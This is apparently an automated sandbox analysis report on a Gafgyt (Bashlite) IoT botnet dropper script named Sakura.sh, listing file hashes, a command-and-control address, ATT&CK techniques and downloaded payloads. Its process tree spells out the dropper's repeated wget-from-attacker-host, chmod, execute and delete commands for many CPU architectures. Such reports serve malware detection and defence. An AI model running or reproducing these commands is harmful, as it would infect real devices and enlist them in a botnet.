gafgyt | 488ca423334c44a2382f5b055e6ee3d0606942f02e4471e53b86fa9c91d36040

Analysis

max time kernel
113s
max time network
97s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
26/02/2025, 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sakura.sh
Size

2KB
MD5

8143209e0f1a57415293b20026bdd5f7
SHA1

53f0b84de451ef851b3d785224f2dc9f88090bf1
SHA256

488ca423334c44a2382f5b055e6ee3d0606942f02e4471e53b86fa9c91d36040
SHA512

1f25bec8f5192c442aad089ecad5caade4d40df8bb4c30e941ba36b9c93fe2d8a9c54c3ad2b00ba1b0df39da39242012738748f2b523b7d17edfd90600d17bf0

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

185.224.0.148:606

Signatures

Detected Gafgyt variant 10 IoCs

resource	yara_rule
behavioral4/files/fstream-1.dat	family_gafgyt
behavioral4/files/fstream-2.dat	family_gafgyt
behavioral4/files/fstream-3.dat	family_gafgyt
behavioral4/files/fstream-4.dat	family_gafgyt
behavioral4/files/fstream-5.dat	family_gafgyt
behavioral4/files/fstream-6.dat	family_gafgyt
behavioral4/files/fstream-7.dat	family_gafgyt
behavioral4/files/fstream-8.dat	family_gafgyt
behavioral4/files/fstream-9.dat	family_gafgyt
behavioral4/files/fstream-12.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
757	chmod
767	chmod
827	chmod
747	chmod
752	chmod
762	chmod
779	chmod
789	chmod
799	chmod
812	chmod
724	chmod
734	chmod
742	chmod

Executes dropped EXE 12 IoCs

ioc	pid	Process
/tmp/m-i.p-s.Sakura	725	Sakura.sh
/tmp/m-p.s-l.Sakura	736	Sakura.sh
/tmp/s-h.4-.Sakura	743	Sakura.sh
/tmp/x-8.6-.Sakura	748	Sakura.sh
/tmp/a-r.m-6.Sakura	753	Sakura.sh
/tmp/x-3.2-.Sakura	758	Sakura.sh
/tmp/a-r.m-7.Sakura	763	Sakura.sh
/tmp/p-p.c-.Sakura	768	Sakura.sh
/tmp/i-5.8-6.Sakura	780	Sakura.sh
/tmp/p-p.c-.Sakura	801	Sakura.sh
/tmp/a-r.m-4.Sakura	814	Sakura.sh
/tmp/a-r.m-5.Sakura	829	Sakura.sh

Reads system routing table 1 TTPs 1 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	m-p.s-l.Sakura

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/route	m-p.s-l.Sakura

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/i-5.8-6.Sakura	wget
File opened for modification	/tmp/a-r.m-4.Sakura	wget
File opened for modification	/tmp/a-r.m-5.Sakura	wget
File opened for modification	/tmp/m-i.p-s.Sakura	wget
File opened for modification	/tmp/m-p.s-l.Sakura	wget
File opened for modification	/tmp/x-8.6-.Sakura	wget
File opened for modification	/tmp/a-r.m-7.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/p-p.c-.Sakura	wget
File opened for modification	/tmp/s-h.4-.Sakura	wget
File opened for modification	/tmp/a-r.m-6.Sakura	wget
File opened for modification	/tmp/x-3.2-.Sakura	wget

/tmp/Sakura.sh
/tmp/Sakura.sh
1⤵
- Executes dropped EXE
PID:703
- /usr/bin/wget
  wget http://185.224.0.148/m-i.p-s.Sakura
  2⤵
  - Writes file to tmp directory
  PID:705
- /bin/chmod
  chmod +x m-i.p-s.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:724
- /tmp/m-i.p-s.Sakura
  ./m-i.p-s.Sakura
  2⤵
  PID:725
- /bin/rm
  rm -rf m-i.p-s.Sakura
  2⤵
  PID:727
- /usr/bin/wget
  wget http://185.224.0.148/m-p.s-l.Sakura
  2⤵
  - Writes file to tmp directory
  PID:728
- /bin/chmod
  chmod +x m-p.s-l.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:734
- /tmp/m-p.s-l.Sakura
  ./m-p.s-l.Sakura
  2⤵
  - Reads system routing table
  - Reads system network configuration
  PID:736
- /bin/rm
  rm -rf m-p.s-l.Sakura
  2⤵
  PID:739
- /usr/bin/wget
  wget http://185.224.0.148/s-h.4-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:740
- /bin/chmod
  chmod +x s-h.4-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/s-h.4-.Sakura
  ./s-h.4-.Sakura
  2⤵
  PID:743
- /bin/rm
  rm -rf s-h.4-.Sakura
  2⤵
  PID:745
- /usr/bin/wget
  wget http://185.224.0.148/x-8.6-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:746
- /bin/chmod
  chmod +x x-8.6-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/x-8.6-.Sakura
  ./x-8.6-.Sakura
  2⤵
  PID:748
- /bin/rm
  rm -rf x-8.6-.Sakura
  2⤵
  PID:750
- /usr/bin/wget
  wget http://185.224.0.148/a-r.m-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:751
- /bin/chmod
  chmod +x a-r.m-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/a-r.m-6.Sakura
  ./a-r.m-6.Sakura
  2⤵
  PID:753
- /bin/rm
  rm -rf a-r.m-6.Sakura
  2⤵
  PID:755
- /usr/bin/wget
  wget http://185.224.0.148/x-3.2-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:756
- /bin/chmod
  chmod +x x-3.2-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/x-3.2-.Sakura
  ./x-3.2-.Sakura
  2⤵
  PID:758
- /bin/rm
  rm -rf x-3.2-.Sakura
  2⤵
  PID:760
- /usr/bin/wget
  wget http://185.224.0.148/a-r.m-7.Sakura
  2⤵
  - Writes file to tmp directory
  PID:761
- /bin/chmod
  chmod +x a-r.m-7.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:762
- /tmp/a-r.m-7.Sakura
  ./a-r.m-7.Sakura
  2⤵
  PID:763
- /bin/rm
  rm -rf a-r.m-7.Sakura
  2⤵
  PID:765
- /usr/bin/wget
  wget http://185.224.0.148/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:766
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  PID:768
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:770
- /usr/bin/wget
  wget http://185.224.0.148/i-5.8-6.Sakura
  2⤵
  - Writes file to tmp directory
  PID:772
- /bin/chmod
  chmod +x i-5.8-6.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:779
- /tmp/i-5.8-6.Sakura
  ./i-5.8-6.Sakura
  2⤵
  PID:780
- /bin/rm
  rm -rf i-5.8-6.Sakura
  2⤵
  PID:783
- /usr/bin/wget
  wget http://185.224.0.148/m-6.8-k.Sakura
  2⤵
  PID:785
- /bin/chmod
  chmod +x m-6.8-k.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:789
- /tmp/m-6.8-k.Sakura
  ./m-6.8-k.Sakura
  2⤵
  PID:791
- /bin/rm
  rm -rf m-6.8-k.Sakura
  2⤵
  PID:793
- /usr/bin/wget
  wget http://185.224.0.148/p-p.c-.Sakura
  2⤵
  - Writes file to tmp directory
  PID:794
- /bin/chmod
  chmod +x p-p.c-.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/p-p.c-.Sakura
  ./p-p.c-.Sakura
  2⤵
  PID:801
- /bin/rm
  rm -rf p-p.c-.Sakura
  2⤵
  PID:804
- /usr/bin/wget
  wget http://185.224.0.148/a-r.m-4.Sakura
  2⤵
  - Writes file to tmp directory
  PID:805
- /bin/chmod
  chmod +x a-r.m-4.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/a-r.m-4.Sakura
  ./a-r.m-4.Sakura
  2⤵
  PID:814
- /bin/rm
  rm -rf a-r.m-4.Sakura
  2⤵
  PID:817
- /usr/bin/wget
  wget http://185.224.0.148/a-r.m-5.Sakura
  2⤵
  - Writes file to tmp directory
  PID:818
- /bin/chmod
  chmod +x a-r.m-5.Sakura
  2⤵
  - File and Directory Permissions Modification
  PID:827
- /tmp/a-r.m-5.Sakura
  ./a-r.m-5.Sakura
  2⤵
  PID:829
- /bin/rm
  rm -rf a-r.m-5.Sakura
  2⤵
  PID:832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/a-r.m-5.Sakura

Filesize
156KB

MD5
99904711224e5a884067f787bdb6bf3e

SHA1
c57fe3f4ec6ec0d1b9da6780dd770a77760f69a9

SHA256
e82abe40df84dace0273374654978c3402b1ce517423bff6df227bbf8fd2f10e

SHA512
5bb058b1f5a8dc2ee44180c9dc9134d4def344b0957bc109b74662deb77720c717ec9d73437d27cc939f61d5d3c3364f2310f9caa6f95d5f3aa9cc898ae6c0b7

Download Submit
/tmp/a-r.m-6.Sakura

Filesize
156KB

MD5
5064fd6f7a7e90a0d7521e43b695eac9

SHA1
50ec581d20adfd5fc53a0d6cd092043f741e8a3f

SHA256
21285533ff114b7ec4b567d9bb7f16d566baf2f165160ba37bd96895de67960f

SHA512
fc7699eeaf25d122fe6e2c28bf80404c857a757013b54c0a4ec19d0519ec134b1cee5c62a6c320e11a99220cc094feabaee5afd8a72b630efaa07d042366e3a6

Download Submit
/tmp/a-r.m-7.Sakura

Filesize
110KB

MD5
a4166aeab57d935a5ef68a4a42847240

SHA1
d017f03d7634e44e2afe6e9be2faf15111f1bb7a

SHA256
41960054f6e73fd8b88c89217c778480da86d2e8f4e2880b52f40010a75cdbdc

SHA512
6bc2cfbb0742e69d67f7498254e644c4cb32c43d847900e2f80dba060572368d31001a7a82c83a83e2c7d202a57bd3f1e4e72ec3d13c2c395a5b91fbf9d22a44

Download Submit
/tmp/i-5.8-6.Sakura

Filesize
115KB

MD5
a93ae0a7d809d32da5ea36916f7f314c

SHA1
1fca1f92ab70bacefd6c52c7ed111f7851daeabf

SHA256
d72a549170f077a73d93c0e537d6ee88bc8444e4ee15638044e48d7ff8a84936

SHA512
6d79022d364dc755b4802884c9c966ad1561ac872810ef21aa4c3a885b378cd28f4c1e3582a43a11b561190318939fb6106a43ca773e683bc34aee9c60b0cf30

Download Submit
/tmp/m-i.p-s.Sakura

Filesize
148KB

MD5
7d4f53ff4ae6639de97dfd56c58d5774

SHA1
2bce33e3f885b1c00f235aa36918816b0f9dc954

SHA256
d86e5485c50f7be06801016427b2d783aea6378584069f12bbd62c090295a65b

SHA512
2356841a87190830bd252c1613498be2686deb3c65e3080d18c389d9827db74fed0204e1c803030f21bf9fee94c66307a529fdf560736ab19eb10bfb5f97012c

Download Submit
/tmp/m-p.s-l.Sakura

Filesize
148KB

MD5
c1751a3301865f176d8008f3a71293cd

SHA1
b8d93a127dafd2dc296dc704691ecaf5d8097984

SHA256
ab55c918dfb95bee50423287b52909ee59e5791b820b08c22d7be6bcd6a59db1

SHA512
cca7fadbb7becf74f3f9b95ae5aa1df527a20fc8ebc7ee343b4639264ec581ce207a9a5ff0eccc4deb3e40494f44cb233f89764158fb7528b95a8dfcea6262ca

Download Submit
/tmp/p-p.c-.Sakura

Filesize
117KB

MD5
95c968992f1adffac90df44c6d87e14a

SHA1
e2a6306a50072f0378625547df9b0bf907d33320

SHA256
806fba8f6dcba4e16aebf11ccb3a55571fad20f8c378655fe7a5e532001c9e31

SHA512
813477c8e0e3985bd6c876dbe396927116ae0a87bcf27056404c68fd6c6c4332b8742cc1fdefd00f20e34cc64af9c1a0b57b61271328200b5ee4f328fca7e4af

Download Submit
/tmp/s-h.4-.Sakura

Filesize
104KB

MD5
471e084b8b4ef5bbeb126516dc287385

SHA1
64fc9ac134490f78a54488b64a4c2caa2c407f26

SHA256
4f440d80f330737f36802f437f04cd8234375d1ae569b4477b42a14e7e1e39e7

SHA512
a3a9d402756ba698bdaf56e15739646dc0b240fc85791544ffe52d0ada465862574ca55b9fba3f8a8d776a8fa639da8cb75ff92b425bd5fb7082fa1c1f97eb14

Download Submit
/tmp/x-3.2-.Sakura

Filesize
94KB

MD5
e6371cbf04307d0427139d20e71b19c6

SHA1
69a59b6c87bffc6bf3f709d82aee58136ec3161d

SHA256
5c2b01fc1337f95b28f1c229fb67d8834d7a4ee3b9d089dba1eafbf03f1ed4fb

SHA512
80d976188d9095f0d613ae0b72cd82808f19b3f5122310deff43dbf11d2f346719af082b49190d22e6ace0f4e90c5dc9da4ccd219c5df7a5ef8e8bd9076b21ee

Download Submit
/tmp/x-8.6-.Sakura

Filesize
108KB

MD5
915b1252c440e860b1e6fb0d0e6f8953

SHA1
dfea5c3a334ea62dca18dfd60e0f9c003073569f

SHA256
cd117b3f1be3ae2ab9fdf8e13460971549243319cfb13b3f8b6dca01c82722c7

SHA512
779f45116b54a8571e1e8e8c44494c3c11a428908349db87d01c979fd7a9d41a857d1a4ab7647318c738bff22cb775605bbc92586c60161ec62a7878976648e5

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads